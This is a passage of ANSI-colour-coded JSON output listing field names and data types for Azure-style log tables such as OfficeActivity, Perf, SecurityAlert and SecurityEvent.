\u001b[94m\"Host\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebW3CLog\"\u001b[39;49;00m: {\n        \u001b[94m\"CIp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CsHost\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CsMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CsUriStem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"OfficeActivity\"\u001b[39;49;00m: {\n        \u001b[94m\"AADTarget\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Actor\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActorContextId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActorIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AffectedItems\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Application\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureActiveDirectory_EventType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Client\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientInfoString\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientMachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Client_IPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CrossMailboxOperations\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"CustomEvent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DataCenterSecurityEventType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestFolder\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxOwnerMasterAccountSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxOwnerSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestMailboxOwnerUPN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationFileExtension\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationRelativeUrl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EffectiveOrganization\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationApprovedTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationApprover\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationDuration\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationRequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationRole\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventSource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Event_Data\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalAccess\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Folder\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Folders\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GenericInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InterSystemsId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InternalLogonType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"IntraSystemId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Item\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ItemType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LoginStatus\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"LogonUserDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Logon_Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineDomainInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxOwnerMasterAccountSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxOwnerSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MailboxOwnerUPN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ModifiedObjectResolvedName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ModifiedProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeObjectId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OfficeWorkload\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Operation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OrganizationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OrganizationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OriginatingServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Parameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendAsUserMailboxGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendAsUserSmtp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendOnBehalfOfUserSmtp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SendonBehalfOfUserMailboxGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SharingType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Site_\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Site_Url\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceFileExtension\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceRelativeUrl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Source_Name\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start_Time\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"SupportTicketId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetContextId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserKey\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserSharedWith\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Operation\"\u001b[39;49;00m: {\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Detail\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HelpLink\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationCategory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationKey\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Solution\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Perf\"\u001b[39;49;00m: {\n        \u001b[94m\"BucketEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"BucketStartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CounterName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CounterPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CounterValue\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Max\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Min\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SampleCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StandardDeviation\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ReservedAzureCommonFields\"\u001b[39;49;00m: {\n        \u001b[94m\"Caller_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientIP_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientInfo_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientPort_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Direction_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailedRequestCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HealthyHostCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HttpMethod_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HttpStatusCode_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HttpStatus_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HttpVersion_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Id_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"JobId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Latency_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"MacAddress_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MatchedConnections_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Priority_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ReceivedBytes_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RequestCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RequestQuery_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestUri_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RuleName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RunbookName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SentBytes_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SslEnabled_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StreamType_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubnetPrefix_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Throughput_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeTaken_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UnHealthyHostCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VnetResourceGuid_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ReservedCommonFields\"\u001b[39;49;00m: {\n        \u001b[94m\"CallerIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"IPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Severity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"SecurityAlert\"\u001b[39;49;00m: {\n        \u001b[94m\"AlertName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConfidenceLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConfidenceScore\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Entities\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedLinks\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsIncident\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessingEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ProductComponentName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProductName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemediationSteps\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"SystemAlertId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VendorName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VendorOriginalId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkspaceResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkspaceSubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"SecurityEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"AccessMask\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Account\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountExpires\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountSessionIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Activity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalInfo2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AllowedToDelegateTo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Attributes\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditPolicyChanges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditsDiscarded\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationLevel\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationService\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CACertificateHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CAPublicKeyHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CalledStationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallingStationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertificateDatabaseHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Channel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClassId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        